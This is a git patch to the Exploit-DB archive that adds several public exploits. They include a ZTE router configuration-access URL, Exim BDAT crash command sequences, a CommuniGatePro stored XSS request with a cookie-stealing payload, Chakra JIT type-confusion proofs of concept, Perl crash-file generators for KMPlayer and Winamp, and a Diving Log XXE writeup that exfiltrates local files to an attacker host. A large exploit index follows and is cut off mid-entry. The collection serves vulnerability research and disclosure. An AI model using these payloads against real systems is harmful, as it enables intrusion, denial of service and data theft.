From f52bbcb598474b2eb0e263405f37fa4893e5c378 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 28 Nov 2017 19:14:29 +0000 Subject: [PATCH] DB: 2017-11-28 15 new exploits --- exploits/hardware/webapps/43188.txt | 21 + exploits/multiple/dos/43184.txt | 55 + exploits/multiple/webapps/43177.txt | 157 + exploits/windows/dos/43180.js | 119 + exploits/windows/dos/43181.js | 112 + exploits/windows/dos/43182.js | 41 + exploits/windows/dos/43183.js | 43 + exploits/windows/dos/43185.pl | 20 + exploits/windows/dos/43186.pl | 22 + exploits/windows/local/43187.txt | 75 + files.csv => files_exploits.csv | 77099 +++++++++++++------------- files_shellcodes.csv | 652 + searchsploit | 0 13 files changed, 39546 insertions(+), 38870 deletions(-) create mode 100644 exploits/hardware/webapps/43188.txt create mode 100644 exploits/multiple/dos/43184.txt create mode 100644 exploits/multiple/webapps/43177.txt create mode 100644 exploits/windows/dos/43180.js create mode 100644 exploits/windows/dos/43181.js create mode 100644 exploits/windows/dos/43182.js create mode 100644 exploits/windows/dos/43183.js create mode 100755 exploits/windows/dos/43185.pl create mode 100755 exploits/windows/dos/43186.pl create mode 100644 exploits/windows/local/43187.txt rename files.csv => files_exploits.csv (69%) create mode 100644 files_shellcodes.csv mode change 100644 => 100755 searchsploit diff --git a/exploits/hardware/webapps/43188.txt b/exploits/hardware/webapps/43188.txt new file mode 100644 index 000000000..c2cdb4cf9 --- /dev/null +++ b/exploits/hardware/webapps/43188.txt @@ -0,0 +1,21 @@ +# Exploit Title: ZTE ZXDSL 831 Unauthorized Configuration Access +# Date: 27/11/2017 +# Exploit Author: Ibad Shah +# Vendor Homepage: zte.com.cn +# Software Link: - +# Version: - ZXDSL - 831CII +# Tested on: Windows 10 +# CVE :- 2017-16953 + +======================================= +The Router usually servers html files & are protected with HTTP Basic +Authentication. However, the CGI files does not protect this file from +getting exposed to public. A Simple GET request would be needed to +made to router that would give a remote attacker an opportunity to +modify router PPPoE configurations, setup malicious configurations +which later could lead to disrupt network & its activities. + + +Proof Of Concept +================ +http://192.168.1.1/connoppp.cgi \ No newline at end of file diff --git a/exploits/multiple/dos/43184.txt b/exploits/multiple/dos/43184.txt new file mode 100644 index 000000000..60cf4e819 --- /dev/null +++ b/exploits/multiple/dos/43184.txt @@ -0,0 +1,55 @@ +While parsing BDAT data header, exim still scans for '.' and consider it the end of mail. +https://github.com/Exim/exim/blob/master/src/src/receive.c#L1867 + +Exim goes into an incorrect state after this message is sent because the function pointer receive_getc is not reset. If the following command is also a BDAT, receive_getc and lwr_receive_getc become the same and an infinite loop occurs inside bdat_getc. Program crashes due to running out of stack. +https://github.com/Exim/exim/blob/master/src/src/smtp_in.c#L547 + +Here is a simple PoC which leads to an infinite loop and program crash: + +EHLO localhost +MAIL FROM: +RCPT TO: +BDAT 10 +. +BDAT 0 + + +Part of debug info +============================ +15:36:54 30502 SMTP>> 250 0 byte chunk received +15:36:54 30502 chunking state 0 +15:36:54 30502 SMTP>> 250 0 byte chunk received +15:36:54 30502 chunking state 0 +15:36:54 30502 SMTP>> 250 0 byte chunk received +15:36:54 30502 chunking state 0 +15:36:54 30502 SMTP>> 250 0 byte chunk received +15:36:54 30502 chunking state 0 +15:36:54 30502 SMTP>> 250 0 byte chunk received +15:36:54 30502 chunking state 0 +15:36:54 30502 SMTP>> 250 0 byte chunk received +15:36:54 30502 chunking state 0 +15:36:54 30502 SMTP>> 250 0 byte chunk received +15:36:54 30502 chunking state 0 +15:36:54 30502 SMTP>> 250 0 byte chunk received +15:36:54 30502 chunking state 0 +15:36:54 30502 SMTP>> 250 0 byte chunk received +15:36:54 30502 chunking state 0 +15:36:54 30295 child 30502 ended: status=0x8b +15:36:54 30295 signal exit, signal 11 (core dumped) +15:36:54 30295 1 SMTP accept process now running +15:36:54 30295 Listening... +============================ + +We also found that this vulnerability can make exim hang(go into an infinite loop without crashing and run forever) even the connection is closed. It seems like this can be used to raise a resource based DoS attack. +This can be triggered using the following command: + +EHLO localhost +MAIL FROM: +RCPT TO: +BDAT 100 +. +MAIL FROM: +RCPT TO: +BDAT 0 LAST + +// Tested on current master, ubuntu16.04. \ No newline at end of file diff --git a/exploits/multiple/webapps/43177.txt b/exploits/multiple/webapps/43177.txt new file mode 100644 index 000000000..26a331eae --- /dev/null +++ b/exploits/multiple/webapps/43177.txt @@ -0,0 +1,157 @@ +# Exploit Title: CommuniGatePro webmails Multiple Stored XSS +# Date: 15/11/2017 +# Exploit Author: Boumediene KADDOUR +# Unit: Algerie Telecom R&D Unit +# Vendor Homepage: https://www.stalker.com/ +# Software Link: http://www.stalker.com/ (paid product) +# Version: 6.1.16< +# Tested on: production server on crystal, pronto and pronto4 webmails from gmail and hotmail. + +CommuniGatePro 6.1.16 webmails (crystal, pronto and pronto4) suffer from multiple stored XSS vulnerabilities. The bellow details illustrate the impact of this vulnerability. + +Vulnerability Description: + +XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. + +Vulnerability details (Stored XSS): + +This vulnerability allowed us to gain access to the following: + + Control the victim's mailbox by just reading my email + + Control the victim's computer in case the person uses Internet Explorer 8 which is widely used in our company. + + Send emails on behalf the victim + + Deface the whole victim mailbox + + Invoke the malicious piece of code each time an attachment's sent to the victim. + +Vulnerable sections: + + Calendar + + Files + + Tasks + + Notes + + ​Inbox + + +Attack Narratives and Scenarios: + +1. Calendar: + +Source webmail: tested with gmail and hotmail + +Destination webmail: Crystal + +In order to deliver our PoC, we have taken the advantages of google calendar to achieve our goal. + + +PoC: + +POST /calendar/event HTTP/1.1 + +Host: calendar.google.com + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 + +Accept: */* + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Referer: https://calendar.google.com/calendar/render?tab=mc + +X-If-No-Redirect: 1 + +X-Is-Xhr-Request: 1 + +Content-Type: application/x-www-form-urlencoded;charset=utf-8 + +Content-Length: 634 + +Cookie: Mycookie + +Connection: close + +​sf=true&output=js&action=CREATE&useproto=true&add=boumediene.k%40victim.dz%2Csnbemail%40gmail.com&crm=BUSY&icc=DEFAULT&sprop=goo.allowModify%3Afalse&sprop=goo.allowInvitesOther%3Atrue&sprop=goo.showInvitees%3Atrue&pprop=eventColor%3Anone&eid=762dgnlok9l44rd63im4kisjnd&eref=762dgnlok9l33rd55im4kisjnd&cts=1511425384353&text=%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E&location=Stored%20XSS&details=Stored%20XSS&src=snbemail%40gmail.com&dates=20171123T093000%2F20171123T103000&unbounded=false&gdoc-attachment&scfdata=W1tdXQ..&stz&etz&scp=ONE&nopts=2&nopts=3&nopts=4&hl=en_GB&secid=6VLs1BGsgBB_Tqz6egnXpCYYF24 + + +Once the victim receives the invitation, he/she will not be obliged to click on any link or download any file. The only condition for this PoC to work is a single click to read the email. Once the victim reads the email, the code gets executed on the victim's browser ending up sending sensitive data to the adversary. + +2. Files: + +Source webmail: pronto/pronto4/Crystal + +Destination webmail: Crystal + +In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following: + + Go to file section. + + Create a directory + + Name the directory with any JavaScript code, in our case () + + Share or grant access to victim to be able to at least read the content of the directory + + The victim then recieves the email of granting access to that directory + + The vitim reads the email and then accesses the directory ending up executing the code within its scope of work + +3. Notes: + +Source webmail: Crystal + +Destination webmail: Crystal + +In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following: + + Create a note + + Put the JavaScript code within it + + Share it with the victim + +4. Tasks: + +Source webmail: pronto/pronto4 + +Destination webmail: Crystal + +In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following: + + Create a task + + Put the JavaScript code within the task name + + publish it + +5. Inbox + +Source webmail: pronto/pronto4 + +Destination webmail: Crystal + +In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following: + + Create an html file with malicious JavaScript piece of code + + Make use of Pronto to send the email to the victim + + The victim reads the email using Crystal webmail and the code gets executed. + +​Remediation: + +Sanitize, escape and validate user supplied data accordingly + +Vulnerability Disclosure Timeline: +================================== +23 Nov, 17 5:36:09 PM: Vendor Notification +23 Nov, 17 6:56:33 PM: Vendor Response/Feedback +24 Nov, 17 : Vendor released new patched version 6.2.1 and included fixes on version 6.1.19 as a separate Crystal skin package (to be installed as cluster/server-wide custom skin) \ No newline at end of file diff --git a/exploits/windows/dos/43180.js b/exploits/windows/dos/43180.js new file mode 100644 index 000000000..6fe85e196 --- /dev/null +++ b/exploits/windows/dos/43180.js @@ -0,0 +1,119 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1364 + +1. +In the Chakra's JIT compilation process, it stores variables' type information by basic block. + +function opt(b) { + let o; + if (b) { + // BASIC BLOCK (a) + o = {}; + } else { + // BASIC BLOCK (b) + o = 1.1; + } + // BASIC BLOCK (c) + return o; +} + +For example, let's think the above code gets optimized. At the basic block (a), the type of "o" is always "Object". At the basic block (b), the type of "o" is always "CanBeTaggedValue_Float". At the basic block (c), it combines the two types, and marks the type of "o" as "CanBeTaggedValue_Mixed"(Object + CanBeTaggedValue_Float). + +Explanation of TaggedValue in Chakra: http://abchatra.github.io/TaggedFloat/ + +But unlike variables, the type information of constants like numbers, strings is managed globally. This means, once a constant is marked as some type in a certain block. All blocks will treat it as that type regardless of the control flow. + +2. +Chakra uses a BailOutOnTaggedValue bailout to ensure a variable's type is "Object". The bailouts can be generated when inlining JavaScript functions. + +function opt(inlinee) { + inlinee(); +} + +Generated IR code for the above code: + StatementBoundary #0 #0000 + s6.var = StartCall 1 (0x1).i32 #0000 + BailOnNotObject s3[LikelyCanBeTaggedValue_Object].var #0006 Bailout: #0006 (BailOutOnInlineFunction) + s10.var = Ld_A [s3[LikelyObject].var+8].u64 #0006 + BailOnNotEqual [s10.var!].i32, 26 (0x1A).i32 # Bailout: #0006 (BailOutOnInlineFunction) + BailOnNotEqual [s3[LikelyObject].var+40].u64, 0xXXXXXXXX (FunctionBody [Anonymous function (#1.3), #4]).u64 # Bailout: #0006 (BailOutOnInlineFunction) + +As you can see after the "BailOnNotObject" opcode which generates "BailOutOnTaggedValue" bailouts, the type of "s3" becomes "LikelyObject" from "LikelyCanBeTaggedValue_Object". This means there's no case where "s3" is not an object after the opcode which ensures its type, so it's safe to use it as an object without checks after the opcode. + +But the problem is that this can be applied to constants. + +Here's the PoC. +*/ + +function opt2(inlinee, v) { + if (v > 0) { + inlinee(); + } else { + inlinee.x = 1.1; + } +} + +function opt() { + opt2(2.3023e-320, null); +} + +function main() { + opt2(() => {}, 1); // feed a function to the profiler + + for (let i = 0; i < 10000; i++) { + opt(); + } +} + +main(); + +/* +We can simply think it as follows: +(NOT PRECISE just for understanding) + +Just after inlining: + // Basic block (a) + s2 = 2.30235E-320; // constant + inlinee = s2; // variable + if (null > 0) { + // Basic block (b) + BailOnNotObject(inlinee); + inlinee(); + } else { + // Basic block (c) + inlinee.x = 1.1; + } + + Type map: + Constants: + s2: CanBeTaggedValue_Float + Basic block (a): + inlinee: CanBeTaggedValue_Float + Basic block (b): + inlinee: CanBeTaggedValue_Float + Basic block (c): + inlinee: CanBeTaggedValue_Float + +In the Global Optimization Phase: + // Basic block (a) + s2 = 2.30235E-320; + if (null > 0) { + // Basic block (b) + BailOnNotObject(s2); + s2(); + } else { + // Basic block (c) + s2.x = 1.1; + } + + Type map: + Constants: + s2: CanBeTaggedValue_Float -> Float + Basic block (a): + Basic block (b): + Basic block (c): + +At the basic block (b), the BailOnNotObject opcode changes the type of "s2" to "Float". And since "s2" is a constant, that change affects the basic block (c). So it leads to type confusion at the basic block (c). + +Note: Just "Float" is considered an Object type. +*/ \ No newline at end of file diff --git a/exploits/windows/dos/43181.js b/exploits/windows/dos/43181.js new file mode 100644 index 000000000..c10aafb77 --- /dev/null +++ b/exploits/windows/dos/43181.js @@ -0,0 +1,112 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1366 + +Here's a snippet of Inline::Optimize. + FOREACH_INSTR_EDITING(instr, instrNext, func->m_headInstr) + { + switch (instr->m_opcode) + { + case Js::OpCode::Label: + { + ... + if (instr->AsLabelInstr()->m_isForInExit) + { + Assert(this->currentForInDepth != 0); // The PoC hits this + this->currentForInDepth--; + } + } + break; + case Js::OpCode::InitForInEnumerator: + if (!func->IsLoopBody()) + { + this->currentForInDepth++; + } + break; + case Js::OpCode::CallI: + ... + instrNext = builtInInlineCandidateOpCode != 0 ? + this->InlineBuiltInFunction(instr, inlineeData, builtInInlineCandidateOpCode, inlinerData, symThis, &isInlined, profileId, recursiveInlineDepth) : + this->InlineScriptFunction(instr, inlineeData, symThis, profileId, &isInlined, recursiveInlineDepth); + ... + } + } + + +"InlineBuiltInFunction" and "InlineScriptFunction" are used to inline a JavaScript function. For example, those methods can convert a call expression as follws. + +Before: + s6.var = StartCall 1 (0x1).i32 #0000 + arg1(s7)<0>.var = ArgOut_A s2.var, s6.var #0003 + CallI s3.var, arg1(s7)<0>.var #0006 + + s0.var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #000c <<--- NEXT INSTRUCTION + +After: + s6.var = StartCall 1 (0x1).i32 #0000 + ... + s12.var = InlineeStart s3.var, iarg1(s7)<24>.var #0006 Func # (#1.3), #4 obj.inlinee + s9[Object].var = Ld_A 0xXXXXXXXX (GlobalObject)[Object].var # Func # (#1.3), #4 + s8.var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #0000 Func # (#1.3), #4 + StatementBoundary #0 #0002 Func # (#1.3), #4 + StatementBoundary #-1 #0002 Func # (#1.3), #4 + InlineeEnd 4 (0x4).i32, s12.var #0000 Func # (#1.3), #4 + + StatementBoundary #0 #000c + s0.var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #000c <<---- NEXT INSTRUCTION + +As you can see the inlinee is wrapped in InlineeStart and InlineeEnd. So to handle the orignal next instructions in the next iterations, those methods must return the call instruction's next instruction. But there's a buggy call flow. + +Here's the call flow. +Inline::InlineBuiltInFunction(...) { + ... + if (inlineCallOpCode == Js::OpCode::InlineFunctionCall) + { + inlineBuiltInEndInstr = InlineCall(callInstr, inlineeData, inlinerData, symCallerThis, pIsInlined, profileId, recursiveInlineDepth); + return inlineBuiltInEndInstr->m_next; + } + ... +} + +-> InlineCall -> InlineCallTarget -> + +Inline::InlineCallApplyTarget_Shared(...) { + IR::Instr* instrNext = callInstr->m_next; + return InlineFunctionCommon(callInstr, originalCallTargetOpndIsJITOpt, originalCallTargetStackSym, inlineeData, inlinee, instrNext, returnValueOpnd, callInstr, nullptr, recursiveInlineDepth, safeThis, isApplyTarget); +} + +Inline::InlineFunctionCommon(...) +{ + ... + return instrNext; +} + +The point is that it ends up returning "callInstr->m_next->m_next". Therefore, "callInstr->m_next" will be never processed. + +In the PoC, "InitForInEnumerator" will be skipped. + + s16[LikelyUndefined_CanBeTaggedValue].var = CallI s6.var, arg2(s15)<8>.var #0015 << will be inlined + InitForInEnumerator s16.var, s17.u64 #001f << Skipped + + +PoC: +*/ + +function opt(obj) { + for (let i in obj.inlinee.call({})) { + } + + for (let i in obj.inlinee.call({})) { + } +} + +function main() { + let obj = { + inlinee: function () { + } + }; + + for (let i = 0; i < 10000; i++) + opt(obj); +} + +main(); \ No newline at end of file diff --git a/exploits/windows/dos/43182.js b/exploits/windows/dos/43182.js new file mode 100644 index 000000000..e59392d72 --- /dev/null +++ b/exploits/windows/dos/43182.js @@ -0,0 +1,41 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1367 + +In the following JavaScript code, both of the print calls must print out "undefined" because of "x" is a formal parameter. But the second print call prints out "function x() { }". This bug may lead to type confusion in JITed code. + +function f(x) { + print(x); + + { + function x() { + + } + } + + print(x); +} + +The following code in "PreVisitFunction" is used to decide how to optimize arguments. + bool doStackArgsOpt = (!pnode->sxFnc.HasAnyWriteToFormals() || funcInfo->GetIsStrictMode()); + +"HasAnyWriteToFormals" set by "Parser::BindPidRefsInScope" returns true in the following example code where "x" is formal. But the method can't detect the above buggy case, so it may end up wrongly optimizing arguments. + +function f(x) { + x = 1; +} + + +PoC: +*/ + +function f(x) { + arguments; + + { + function x() { + } + } +} + +for (let i = 0; i < 10000; i++) + f(); \ No newline at end of file diff --git a/exploits/windows/dos/43183.js b/exploits/windows/dos/43183.js new file mode 100644 index 000000000..0fa16184b --- /dev/null +++ b/exploits/windows/dos/43183.js @@ -0,0 +1,43 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1365 + +Some background: https://bugs.chromium.org/p/project-zero/issues/detail?id=1364 + +There's one more place that emits a BailOnNotObject opcode. + +Here's a snippet of GlobOpt::OptTagChecks. + if (valueType.CanBeTaggedValue() && + !valueType.HasBeenNumber() && + (this->IsLoopPrePass() || !this->currentBlock->loop)) + { + ValueType newValueType = valueType.SetCanBeTaggedValue(false); + + // Split out the tag check as a separate instruction. + IR::Instr *bailOutInstr; + bailOutInstr = IR::BailOutInstr::New(Js::OpCode::BailOnNotObject, IR::BailOutOnTaggedValue, instr, instr->m_func); + ... + } + +The JIT compiler analyzes a loop twice for some reasons such as to track types properly. In the first analysis, "IsLoopPrePass" returns true. And it returns false in the second analysis. + +But in the above snippet, it emits the bailout opcode in the first analysis("this->IsLoopPrePass()" is satisfied). But the return value of "valueType.HasBeenNumber()" can be different in the second analysis. So it may fail to detect type changes. + +PoC: +*/ + +function opt() { + let obj = [2.3023e-320]; + for (let i = 0; i < 1; i++) { + obj.x = 1; // In the first analysis, BailOnNotObject emitted + obj = +obj; // Change the type + obj.x = 1; // Type confusion + } +} + +function main() { + for (let i = 0; i < 1000; i++) { + opt(); + } +} + +main(); \ No newline at end of file diff --git a/exploits/windows/dos/43185.pl b/exploits/windows/dos/43185.pl new file mode 100755 index 000000000..8276d6c1d --- /dev/null +++ b/exploits/windows/dos/43185.pl @@ -0,0 +1,20 @@ +#! /usr/bin/perl +# Exploit Title: KMPlayer .nsv Denial of Service +# Date: 2017-11-22 +# Exploit Author: R.Yavari +# Version: v4.2.2.4 +# Tested on: Windows 10 , Windows 7 +# other version should be affected +# NSV is Streaming video container format developed by Nullsoft; used for streaming video clips over the Internet, +# such as video feeds for Winamp TV; supports multiple types of compression and can include multiple audio tracks, subtitles, and other data. +# CVE-2017-16952 +# http://cdn.kmplayer.com/KMP/Download/release/chrome/4.2.2.4/KMPlayer_4.2.2.4.exe +# (D.P) + +open(code, ">kmplayer.nsv") || die "can't create crash sample.$!"; +binmode(code); +$data = +"\x52\x49\x46\x46\xc2\x58\x01\x00\x57\x41\x56\x45"; +print code $data; + +close(code); \ No newline at end of file diff --git a/exploits/windows/dos/43186.pl b/exploits/windows/dos/43186.pl new file mode 100755 index 000000000..12d33fdeb --- /dev/null +++ b/exploits/windows/dos/43186.pl @@ -0,0 +1,22 @@ +#! /usr/bin/perl +# Exploit Title: Winamp Pro (.wav|.wmv|.au|.asf|.aiff|.aif ) Denial of Service +# Date: 2017-11-22 +# Exploit Author: R.Yavari +# Version: v5.66.Build.3512 +# Tested on: Windows 10 , Windows 7 +# other version should be affected +# CVE-2017-16951 +# http://meggamusic.co.uk/winamp/winamp5666_full_en-us_redux.exe +# (D.P) +open(code, ">winamp.wav") || die "can't create crash sample.$!"; +binmode(code); +$data = +"\x52\x49\x46\x46\xc2\x58\x01\x00\x57\x41\x56\x45\x44\x44\x44\x44" . +"\xf8\xff\xff\xff\x01\x00\x01\x00\x22\x56\x00\x00\x44\xac\x00\x00" . +"\x02\x00\x10\x00\x00\x00\x66\x61\x63\x74\x04\x00\x00\x00\x48\xac" . +"\x13\x00\x13\x00\x12\x00\x14\x00\x14\x00"; + + +print code $data; + +close(code); \ No newline at end of file diff --git a/exploits/windows/local/43187.txt b/exploits/windows/local/43187.txt new file mode 100644 index 000000000..bc4d7b568 --- /dev/null +++ b/exploits/windows/local/43187.txt @@ -0,0 +1,75 @@ +[+] Exploit Title: Diving Log 6.0 XXE Injection +[+] Date: 27-11-2017 +[+] Exploit Author: Trent Gordon +[+] Vendor Homepage: http://www.divinglog.de +[+] Software Link: http://www.divinglog.de/english/download/ +[+] Disclosed at: https://thenopsled.com/divinglog.txt +[+] Version: 6.0 +[+] Tested on: Windows 7 SP1, Windows 10 +[+] CVE: CVE-2017-9095 + +================== +Background: +================== +Diving Log 6.0 is a scuba diving log software that manages and consolidates logs from other disparate sources. Many scuba diving log software programs export their data in an XML file. + +================== +Vulnerability: +================== +By having a user import a crafted dive.xml file (very common, many divers share logs), it is possible to execute a XXE injection which retrieves local files and exfiltrates them to a remote attacker. +1.)Open Diving Log 6.0 +2.)Close "Welcome Center" popup and select "Import" from the bottom left corner +3.)Select "Subsurface" from the list of import data types. +4.)"Open File" and select the crafted dive.xml file (with listener open on ATTACKERS-IP) + +================== +Proof of Concept: +================== + +a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting payload.dtd) + +b.) Hosted "payload.dtd" + + + +"> + + +c.) Exploited "dive.xml" + + + +%sp; +%param1; +%exfil; +]> + + + + + + + + + + + + + + + + + + + + + + + + + +================== +Additional Attack Vectors: +================== +I tested and exploited the "subsurface" import option, however MANY other dive log software programs use XML and most are available as Import options in Diving Log 6.0. This XXE injection vulnerability is most likely vulnerable in every import option that utilizes XML for the underlying custom file format(.UDCF and .UDDF, for example). \ No newline at end of file diff --git a/files.csv b/files_exploits.csv similarity index 69% rename from files.csv rename to files_exploits.csv index 7487e5db3..f3f4fe907 100644 --- a/files.csv +++ b/files_exploits.csv @@ -1,38870 +1,38229 @@ -id,file,description,date,author,platform,type,port -9,exploits/windows/dos/9.c,"Apache 2.x - Memory Leak",2003-04-09,"Matthew Murphy",windows,dos, -37060,exploits/windows/dos/37060.html,"Microsoft Internet Explorer 11 - Crash (PoC) (1)",2015-05-19,Garage4Hackers,windows,dos, -11,exploits/linux/dos/11.c,"Apache 2.0.44 (Linux) - Remote Denial of Service",2003-04-11,"Daniel Nystram",linux,dos, -13,exploits/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service",2003-04-18,"Luca Ercoli",windows,dos, -17,exploits/windows/dos/17.pl,"Xeneo Web Server 2.2.9.0 - Denial of Service",2003-04-22,"Tom Ferris",windows,dos, -22,exploits/windows/dos/22.c,"Pi3Web 2.0.1 - Denial of Service (PoC)",2003-04-29,aT4r,windows,dos, -35,exploits/windows/dos/35.c,"Microsoft IIS 5.0 < 5.1 - Remote Denial of Service",2003-05-31,Shachank,windows,dos, -38,exploits/linux/dos/38.pl,"Apache 2.0.45 - 'APR' Crash",2003-06-08,"Matthew Murphy",linux,dos,80 -59,exploits/hardware/dos/59.c,"Cisco IOS - IPv4 Packets Denial of Service",2003-07-18,l0cK,hardware,dos, -60,exploits/hardware/dos/60.c,"Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service",2003-07-21,"Martin Kluge",hardware,dos, -61,exploits/windows/dos/61.c,"Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service",2003-07-21,Flashsky,windows,dos, -62,exploits/hardware/dos/62.tcsh,"Cisco IOS - using hping Remote Denial of Service",2003-07-22,zerash,hardware,dos, -65,exploits/windows/dos/65.c,"Microsoft Windows SQL Server - Remote Denial of Service (MS03-031)",2003-07-25,refdom,windows,dos, -68,exploits/linux/dos/68.c,"Linux Kernel 2.4.20 - 'decode_fh' Denial of Service",2003-07-29,"Jared Stanbrough",linux,dos, -73,exploits/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service",2003-08-01,l0bstah,windows,dos, -82,exploits/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service",2003-08-20,"Luca Ercoli",windows,dos, -94,exploits/multiple/dos/94.c,"MyServer 0.4.3 - Denial of Service",2003-09-08,badpack3t,multiple,dos,80 -111,exploits/windows/dos/111.c,"Microsoft Windows Messenger Service - Denial of Service (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos, -113,exploits/windows/dos/113.pl,"Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (PoC) (MS03-046)",2003-10-22,"H D Moore",windows,dos, -115,exploits/linux/dos/115.c,"WU-FTPD 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service",2003-10-31,"Angelo Rosiello",linux,dos, -146,exploits/multiple/dos/146.c,"OpenSSL ASN.1 < 0.9.6j/0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos, -147,exploits/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow",2004-01-23,"Luigi Auriemma",windows,dos, -148,exploits/windows/dos/148.sh,"Microsoft Windows XP/2003 - Samba Share Resource Exhaustion (Denial of Service)",2004-01-25,"Steve Ladjabi",windows,dos, -153,exploits/windows/dos/153.c,"Microsoft Windows - ASN.1 'LSASS.exe' Remote Denial of Service (MS04-007)",2004-02-14,"Christophe Devine",windows,dos, -161,exploits/windows/dos/161.c,"Red Faction 1.20 - Server Reply Remote Buffer Overflow",2004-03-04,"Luigi Auriemma",windows,dos, -170,exploits/multiple/dos/170.c,"Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service",2004-03-26,"Rémi Denis-Courmont",multiple,dos, -176,exploits/windows/dos/176.c,"Microsoft IIS - SSL Remote Denial of Service (MS04-011)",2004-04-14,"David Barroso",windows,dos, -185,exploits/linux/dos/185.sh,"Slackware Linux - '/usr/bin/ppp-off' Insecure /tmp Call",2000-11-17,sinfony,linux,dos, -195,exploits/hp-ux/dos/195.sh,"HP-UX 11.00/10.20 crontab - Overwrite Files",2000-11-19,dubhe,hp-ux,dos, -212,exploits/hp-ux/dos/212.c,"HP-UX FTPD - Remote Buffer Overflow",2000-12-01,venglin,hp-ux,dos, -214,exploits/windows/dos/214.c,"Microsoft Windows - 'Jolt2.c' Denial of Service (MS00-029)",2000-12-02,phonix,windows,dos, -233,exploits/windows/dos/233.pl,"Solaris 2.7/2.8 Catman - Local Insecure tmp Symlink",2000-12-19,"Shane Hird",windows,dos, -235,exploits/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber",2000-12-20,lwc,solaris,dos, -236,exploits/linux/dos/236.sh,"RedHat 6.1/6.2 - TTY Flood Users",2001-01-02,teleh0r,linux,dos, -238,exploits/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos, -240,exploits/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx",2001-01-03,Optyx,solaris,dos, -241,exploits/linux/dos/241.c,"ProFTPd 1.2.0 rc2 - Memory Leakage",2001-01-03,"Piotr Zurawski",linux,dos,21 -244,exploits/linux/dos/244.java,"ProFTPd 1.2.0 pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21 -251,exploits/linux/dos/251.c,"APC UPS 3.7.2 - 'apcupsd' Local Denial of Service",2001-01-15,"the itch",linux,dos, -262,exploits/hardware/dos/262.pl,"Cisco (Multiple Products) - Automated Tool",2001-01-27,hypoclear,hardware,dos, -264,exploits/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service",2001-05-07,honoriak,novell,dos, -274,exploits/linux/dos/274.c,"Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service",2004-04-21,"Julien Tinnes",linux,dos, -276,exploits/windows/dos/276.delphi,"Microsoft Windows XP/2000 - TCP Connection Reset",2004-04-22,Aphex,windows,dos, -291,exploits/linux/dos/291.c,"TCP Connection Reset - Remote Denial of Service",2004-04-23,"Paul A. Watson",linux,dos, -298,exploits/windows/dos/298.pl,"Emule 0.42e - Remote Denial of Service",2004-05-16,"Rafel Ivgi",windows,dos,80 -299,exploits/windows/dos/299.c,"Symantec Multiple Firewall - DNS Response Denial of Service",2004-05-16,houseofdabus,windows,dos, -306,exploits/linux/dos/306.c,"Linux Kernel 2.4.x/2.6.x - Assembler Inline Function Local Denial of Service",2004-06-25,lorenzo,linux,dos, -312,exploits/windows/dos/312.txt,"Norton AntiVirus - Denial of Service",2004-07-12,"Bipin Gautam",windows,dos, -324,exploits/windows/dos/324.txt,"Ping of Death - Remote Denial of Service",1996-10-21,anonymous,windows,dos, -329,exploits/windows/dos/329.txt,"Microsoft Windows NT - Crash with an Extra Long 'Username' Denial of Service",1997-04-01,Fyodor,windows,dos, -343,exploits/bsd/dos/343.c,"TCP SYN - 'bang.c' Denial of Service",2002-09-17,Nebunu,bsd,dos, -345,exploits/windows/dos/345.c,"UDP Stress Tester - Denial of Service",2002-09-10,Cys,windows,dos, -354,exploits/windows/dos/354.html,"Microsoft Internet Explorer - Overly Trusted Location Cache",2004-07-18,anonymous,windows,dos, -356,exploits/windows/dos/356.c,"OverByte ICS FTP Server - Remote Denial of Service",2004-07-20,ATmaCA,windows,dos, -357,exploits/windows/dos/357.c,"Medal of Honor - Remote Buffer Overflow",2004-07-20,"Luigi Auriemma",windows,dos, -358,exploits/hardware/dos/358.txt,"Lexmark Multiple HTTP Servers - Denial of Service",2004-07-22,"Peter Kruse",hardware,dos, -360,exploits/multiple/dos/360.pl,"Apache - Arbitrary Long HTTP Headers Denial of Service (Perl)",2004-07-22,bkbll,multiple,dos,80 -362,exploits/windows/dos/362.sh,"Xitami Web Server - Denial of Service",2004-07-22,CoolICE,windows,dos, -363,exploits/hardware/dos/363.txt,"Conceptronic CADSLR1 Router - Denial of Service",2004-07-22,"Seth Alan Woolley",hardware,dos, -365,exploits/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service (11 